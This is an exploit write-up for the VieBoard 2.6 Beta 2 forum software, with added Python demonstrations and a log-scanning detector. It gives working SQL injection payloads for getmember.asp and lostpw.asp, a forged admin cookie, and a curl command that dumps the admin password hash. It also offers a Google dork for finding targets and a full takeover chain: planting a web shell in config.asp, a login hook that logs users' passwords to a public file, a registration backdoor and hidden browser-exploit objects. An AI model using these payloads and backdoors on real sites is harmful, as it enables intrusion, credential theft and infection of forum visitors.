Analysis of Security Flaws in VieBoard 2.6 Beta 2
http://www.security.com.vn/details.php?ID=131
Part I: Finding the bugs
- Bug: SQL injection in file `lostpw.asp`
line 32:
set rs = db.execute("Select tblMember.mSN,tblMember.mPwd,tblMemberInfo.mEmail from tblMember,tblMemberInfo where tblMember.mSN = '" & Replace(Request.form("username"),"<","<") & "' AND tblMemberInfo.mID = tblMember.mID")
The Replace() only rewrites `<`; a single quote in `username` reaches the query untouched, so the string literal can be closed and a UNION appended.
- Exploitation:
http://www.target.com/vie/lostpw.asp
Your username: ' and 1=2 union select tblMember.mSN, tblMember.mPwd, 'email-to-receive-the-result' from tblMember,tblMemberInfo where tblMember.mSN='admin-username
Resulting query:
(Select tblMember.mSN,tblMember.mPwd,tblMemberInfo.mEmail from tblMember,tblMemberInfo where tblMember.mSN='' and 1=2 union select tblMember.mSN, tblMember.mPwd, 'email-to-receive-the-result' from tblMember,tblMemberInfo where tblMember.mSN='admin-username' AND tblMemberInfo.mID = tblMember.mID)
The `1=2` empties the first SELECT; the UNION returns the admin's mSN and mPwd with the attacker's address in the mEmail column, so whatever lostpw.asp sends to mEmail goes to the attacker instead of the admin.
- Bug: SQL injection in file `getmember.asp`
line 12:
<% set rs = db.execute("Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN = '" & Request("mSN") & "'") %>
Here there is no filtering at all, and Request("mSN") accepts the value from the query string, form or cookies alike, so the payload can be sent in a plain GET.
- Exploitation:
http://www.target.com/vie/getMember.asp?msn=admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='admin-username
Resulting query:
(Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN='admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='admin-username')
mPwd takes the place of mSN in the result set, so it is shown wherever the page prints the member's name.
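How the two injections above work, as an added example that is neither VieBoard code nor part of the advisory: a Python/SQLite stand-in for the two tables, the queries from lines 32 and 12 rebuilt with the same string concatenation, the advisory's two payloads run through them, and a parameterised version that the same payload no longer affects. The table contents, the column set of tblMemberInfo, the attacker address, the hash value and the function names are all constructed for this example.

```python
import sqlite3

# Constructed sample data for this example (not from the advisory); the 64-hex mPwd
# mirrors the shape of the value shown in the curl output later on the page.
ADMIN_HASH = "37bd45d638c2d11c49c641d2e9c4f49f406caf3ee282743e0c800aa1ed68e2ee"


def make_db():
    """In-memory stand-in for the two VieBoard tables the advisory's queries touch.
    Column names follow the advisory; the column set of tblMemberInfo is assumed."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        create table tblMember (mID integer, mSN text, mPwd text, mDate text);
        create table tblMemberInfo (mID integer, mEmail text, mHobbies text);
        insert into tblMember values (1, 'admin', '{ADMIN_HASH}', '2003-10-29');
        insert into tblMember values (2, 'bob', 'f00dbabe', '2003-10-30');
        insert into tblMemberInfo values (1, 'admin@target.com', 'chess');
        insert into tblMemberInfo values (2, 'bob@target.com', 'music');
    """)
    return db


def getmember_vulnerable(db, msn):
    """Same string concatenation as getmember.asp line 12: msn is pasted between quotes."""
    sql = ("Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo "
           "where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN = '" + msn + "'")
    return db.execute(sql).fetchall()


def lostpw_vulnerable(db, username):
    """Same shape as lostpw.asp line 32. The Replace() there only rewrites '<' (modelled
    here as an HTML-entity escape, which is an assumption); the single quote passes through."""
    sql = ("Select tblMember.mSN,tblMember.mPwd,tblMemberInfo.mEmail from tblMember,tblMemberInfo "
           "where tblMember.mSN = '" + username.replace("<", "&lt;") + "' "
           "AND tblMemberInfo.mID = tblMember.mID")
    return db.execute(sql).fetchall()


def getmember_safe(db, msn):
    """Fix: bind msn as a parameter, so quotes inside it are data, never SQL."""
    sql = ("Select tblMember.mSN,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo "
           "where tblMember.mID = tblMemberInfo.mID AND tblMember.mSN = ?")
    return db.execute(sql, (msn,)).fetchall()


# The advisory's two payloads, with 'admin' as the admin username and a constructed attacker address.
GETMEMBER_PAYLOAD = ("admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* "
                     "from tblMember, tblMemberInfo where tblMember.mSN='admin")
LOSTPW_PAYLOAD = ("' and 1=2 union select tblMember.mSN, tblMember.mPwd, 'attacker@evil.test' "
                  "from tblMember,tblMemberInfo where tblMember.mSN='admin")


def leaked_hash_via_getmember(db):
    """Column 0 of every returned row now carries mPwd instead of mSN: the '1=2' kills the
    genuine rows and the UNION supplies the admin's hash in their place."""
    rows = getmember_vulnerable(db, GETMEMBER_PAYLOAD)
    hashes = {r[0] for r in rows}
    return hashes.pop() if len(hashes) == 1 else None


def redirected_reset_via_lostpw(db):
    """The mEmail column is replaced by the attacker's literal, so whatever lostpw.asp
    mails (the username and mPwd) goes to the attacker instead of the admin."""
    return lostpw_vulnerable(db, LOSTPW_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("getmember leak:", leaked_hash_via_getmember(db))
    print("lostpw redirect:", redirected_reset_via_lostpw(db))
    print("parameterised query fed the same payload:", getmember_safe(db, GETMEMBER_PAYLOAD))
```

The parameterised version is the whole fix for both pages: with `?` binding, the payload is looked up as a literal username and matches nothing. Escaping only `<`, as line 32 does, is not a substitute.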
- Bug: cookie forgery in file `login_action.asp`: the login state is read from the `isLogged` cookie and trusted as-is, so the client can set its fields freely.
- Exploitation:
Cookie: isLogged=mod=True&mSN=admin-username&group=1&mid=1
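The cookie check, as an added example rather than VieBoard's code: a parse that takes the `isLogged` fields at face value (which is what the forgery above relies on) next to an HMAC-signed variant that rejects the forged cookie and any tampered copy of a genuine one. The secret, the field values and the function names are assumptions made for this example.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

# The cookie the advisory forges; nothing in it is bound to a server-side session.
FORGED_COOKIE = "mod=True&mSN=admin&group=1&mid=1"


def parse_islogged_unsigned(cookie_value):
    """Trusting parse, as the advisory's exploit implies login_action.asp does:
    whatever the client puts in group/mid is what the server believes."""
    fields = {k: v[0] for k, v in parse_qs(cookie_value).items()}
    return {"mSN": fields.get("mSN"), "group": int(fields.get("group", "0")),
            "mid": int(fields.get("mid", "0"))}


def is_admin_unsigned(cookie_value):
    return parse_islogged_unsigned(cookie_value)["group"] == 1


# Hardened variant (added here, not VieBoard code): the server appends an HMAC over the
# fields, keyed with a secret that never leaves the server, and rejects any cookie whose
# MAC does not match. The secret value below is a placeholder for the example.
SERVER_SECRET = b"replace-with-a-random-server-only-secret"


def sign_islogged(fields, secret=SERVER_SECRET):
    body = urlencode(fields)
    mac = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}&sig={mac}"


def verify_islogged(cookie_value, secret=SERVER_SECRET):
    """Return the fields if the MAC checks out, else None (forged, tampered or unsigned)."""
    body, sep, sig = cookie_value.rpartition("&sig=")
    if not sep:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None
    return {k: v[0] for k, v in parse_qs(body).items()}


def is_admin_signed(cookie_value, secret=SERVER_SECRET):
    fields = verify_islogged(cookie_value, secret)
    return fields is not None and fields.get("group") == "1"


if __name__ == "__main__":
    print("unsigned check accepts forged cookie:", is_admin_unsigned(FORGED_COOKIE))
    print("signed check accepts forged cookie:", is_admin_signed(FORGED_COOKIE))
    real = sign_islogged({"mod": "False", "mSN": "bob", "group": "2", "mid": "2"})
    print("signed check accepts genuine cookie:", verify_islogged(real) is not None)
    print("genuine cookie with group edited:", is_admin_signed(real.replace("group=2", "group=1")))
```

A signed cookie still replays until it expires, so a timestamp inside the signed body, or better an opaque session ID with the group looked up server-side, is the usual design; the point here is only that a client-supplied `group=1` must never be believed on its own.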
Part II: Exploitation
- Find targets with http://www.google.com.vn/, search term: `allinurl:getmember.asp`
Step 1: identify the admin's username
http://www.target.com/vie/staff.asp
Step 2: get the admin's password (the stored mPwd)
Method 1: SQL injection
http://www.target.com/vie/getMember.asp?msn=admin' and 1=2 union select tblMember.mPwd,tblMember.mDate ,tblMemberInfo.* from tblMember, tblMemberInfo where tblMember.mSN='admin
Method 2: cookie forgery, then run the query through the admin panel's SQL page
C:\> curl --cookie "isLogged=mod=True&mSN=admin&group=1&mid=1" --data "query=select+mPwd+from+tblMember+where+mSN%3D%27admin%27" http://www.target.com/vie/adm_fr_m_query.asp
<html>
<head>
<link rel="stylesheet" type="text/css" href="skin/style.css">
</style>
<style>
td.adm{ background: url('adm_bg.gif') repeat-x bottom; font:bold 10px verdana;color:#37386D; border:none}
.admh{font:22px verdana;color:#37386D}
</style>
</head>
<body leftmargin=0 rightmargin=0 bottommargin=0 topmargin=0 marginwidth=0 marginheight=0>
<table bgcolor=white width=100% class=sm cellpadding=2>
<tr>
<td class=adm height=23 align=center>VieBoard Administration
</tr>
</table>
<font class=admh>SQL Query</font>
<table width=100% cellpadding=3 style="border:1px solid silver;font:11px courier new"><tr><td bgcolor=F0F0F0 width="100%">mPwd</td></tr><tr><td nowrap bgcolor=FAFAFA>37bd45d638c2d11c49c641d2e9c4f49f406caf3ee282743e0c800aa1ed68e2ee</b></td></tr></table><p class=small>1 row(s) affected by this query<br>Run time: 10/29/2003 9:31:44 AM
</body>
</html>
The mPwd value returned is the stored 64-hex-digit hash, not the cleartext password.
(download curl.exe)
Step 3: set a new password for the admin
http://www.target.com/vie/verify.asp
Step 5: log in to the admin panel with the new password
http://www.target.com/vie/login.asp
http://www.target.com/vie/adm_fr.asp
Step 6: embed 4in1 in file config.asp
http://www.target.com/vie/adm_fr_m_config.asp?mode=editconfig
(see file config.asp)
Step 7: enable 4in1
<form action=http://www.target.com/vie/inc/config.asp method=post>
<input type=hidden name=h4x value=0r>
<input type=submit value=h4x0r>
</form>
(download h4x0r.htm)
Step 8: install 4in1
(download post_reply.asp)
Step 9: restore VieBoard to its previous state
- restore the old config.asp:
http://www.target.com/vie/post_reply.asp
(delete inc/config_bak.asp, edit inc/config.asp: remove 4in1)
- set the admin's old password back:
http://www.target.com/vie/adm_fr.asp
Step 10: install other things
http://www.target.com/vie/post_reply.asp
- log the users' passwords:
(see file login_action.asp)
[...]
else ' if nick and pwd are both correct
[...]
on error resume next   ' a failure to write the log must not break the login
dim fso1,f1,m_ID,mEMail
m_ID=rs("mID")
qSelect="select mEmail from tblMemberInfo where mID="&m_ID
set rs=db.execute(qSelect)
set fso1=createobject("scripting.filesystemobject")
set f1=fso1.opentextfile(server.mappath("readme.txt"),8,true)   ' 8 = ForAppending, create if missing
f1.writeline mSN&"|"&mPwd&"|"&rs("mEmail")&"|"&retry&"|"&now
f1.close
set fso1=nothing
[...]
(collect the passwords from http://www.target.com/vie/readme.txt; the file sits in the web root, so anyone who knows the name can read it)
- put a backdoor in user registration:
(see file register_action.asp)
if (mHobbies="h4x0r") then tmp("mGroup")=1
http://www.target.com/vie/register.asp
Registering with "h4x0r" in the hobbies field then yields an account in group 1, the same group the forged cookie above claims.
- plant scripts, Flash or `malicious` code exploiting security holes in web browsers (IE, Netscape, ...) in the .asp, .html, ... files; set the object's width and height to 0 so it is invisible:
<width=0 height=0 ...>
Part III: Defence
- http://www.vienuke.com/
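Part III gives only a pointer. As an added example on the defensive side (written for this page, not the advisory's or VieBoard's code): a scanner over constructed IIS-style log lines that flags the getMember.asp injection from Part II, requests to the admin SQL page, and fetches of the planted readme.txt. The log format, field order, addresses and timestamps are assumed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style (W3C extended) log lines for this example; not real traffic. The
# #Fields header states the assumed column order.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-10-29 09:30:12 10.0.0.5 GET /vie/getMember.asp msn=admin'+and+1%3D2+union+select+tblMember.mPwd,tblMember.mDate+,tblMemberInfo.*+from+tblMember,+tblMemberInfo+where+tblMember.mSN%3D'admin 200
2003-10-29 09:31:44 10.0.0.5 POST /vie/adm_fr_m_query.asp - 200
2003-10-29 09:40:01 10.0.0.5 GET /vie/readme.txt - 200
2003-10-29 09:41:10 10.0.0.9 GET /vie/getMember.asp msn=bob 200
2003-10-29 09:42:00 10.0.0.9 POST /vie/lostpw.asp - 200
"""

# Pages whose string parameter reaches SQL unescaped (Part I), and two post-exploitation
# indicators from Part II: the admin SQL console and the password-dump file.
INJECTABLE = ("/getmember.asp", "/lostpw.asp")
SQLI_RE = re.compile(r"union\s+(all\s+)?select|\btblmember", re.IGNORECASE)


def scan_log(text):
    """Return one hit per suspicious request: {'line', 'ip', 'stem', 'rule', 'detail'}."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = parts[:7]
        stem_l = stem.lower()
        # IIS logs the query string URL-encoded; decode before matching so %27 and + do not hide the payload.
        decoded = unquote_plus(query) if query != "-" else ""
        rule = None
        if stem_l.endswith(INJECTABLE) and ("'" in decoded or SQLI_RE.search(decoded)):
            rule = "sqli"
        elif stem_l.endswith("/adm_fr_m_query.asp"):
            rule = "admin-sql-console"
        elif stem_l.endswith("/readme.txt"):
            rule = "readme-dump"
        if rule:
            hits.append({"line": n, "ip": ip, "stem": stem, "rule": rule, "detail": decoded})
    return hits


def suspicious_ips(text):
    """Source addresses with at least one hit, most hits first."""
    counts = {}
    for h in scan_log(text):
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(counts, key=lambda ip: -counts[ip])


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']}: {h['rule']:18} {h['ip']} {h['stem']} {h['detail'][:60]}")
    print("suspicious IPs:", suspicious_ips(SAMPLE_LOG))
```

The lostpw.asp injection travels in a POST body, which the web server log does not record, so that line produces no hit; catching it needs application-level logging of the submitted username, or filtering before the query is built. Any request at all to adm_fr_m_query.asp from an address that is not a known administrator deserves a look, since the cookie forgery leaves no other trace in the log.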